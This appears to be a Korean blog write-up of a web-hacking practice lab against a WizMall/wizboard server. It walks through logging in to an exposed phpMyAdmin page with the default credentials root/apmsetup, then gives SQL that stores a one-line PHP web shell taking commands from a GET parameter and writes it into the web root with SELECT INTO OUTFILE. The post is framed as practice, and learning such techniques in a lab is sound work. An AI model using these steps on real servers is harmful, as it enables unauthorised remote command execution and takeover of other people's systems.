웹해킹실습 WizMall
by #독개#
웹쉘획득
오픈소스 서버를 통해 wizboard/phpmyadmin/main.php 를 통해 DB를 관리할수 있다는것을 파악했다.
혹시 공격서버에도 존재하지 않을까?
![]()
오호~! 접속이 가능했다. ID와 PW를 구하는것이 중요한데..
혹시 wizboard를 기본설치 할때 셋팅되는 ID/PW에서 변경하지 않았을수도 있으니
root/apmsetup 입력!
![]()
오호!! 오픈되엇다 (이서버의 DB관리페이지에 접근을 한거다!!)
아무거나 링크를 눌러봤는데 오류발생
![]()
이유는 서버페이지가 너무 예전꺼라 최신 크롬에서 앞에 http://192.168...이런 주소를 생략해서 그런것이다.
그래서 익스플로러로 다시진행했더니 잘되었다.
SQL 쿼리를 날리자
![]()
쿼리문분석
//mysql DB사용
use mysql;
//webshell 테이블 생성
create table webshell(code text); //
//
insert into webshell(code) values("<? system($_GET['cmd']); ?>");
select * into outfile "c:\\APM_SETUP\\htdocs\\webshell.php" from webshell;
'🧛♂️ 해킹 > 웹해킹' 카테고리의 다른 글
민감한 데이터 노출 (0) | 2020.07.31 |
---|---|
알려진 취약점사용 (CVE , Exploit-db) (0) | 2020.07.31 |
CSRF(크로스 사이트 요청 변조) (0) | 2020.07.31 |
SQL Map (상용툴) (0) | 2020.07.30 |
취약한 직접 객체 참조 (파일업로드,리버스텔넷) (0) | 2020.07.29 |
블로그의 정보
독한 개발자
#독개#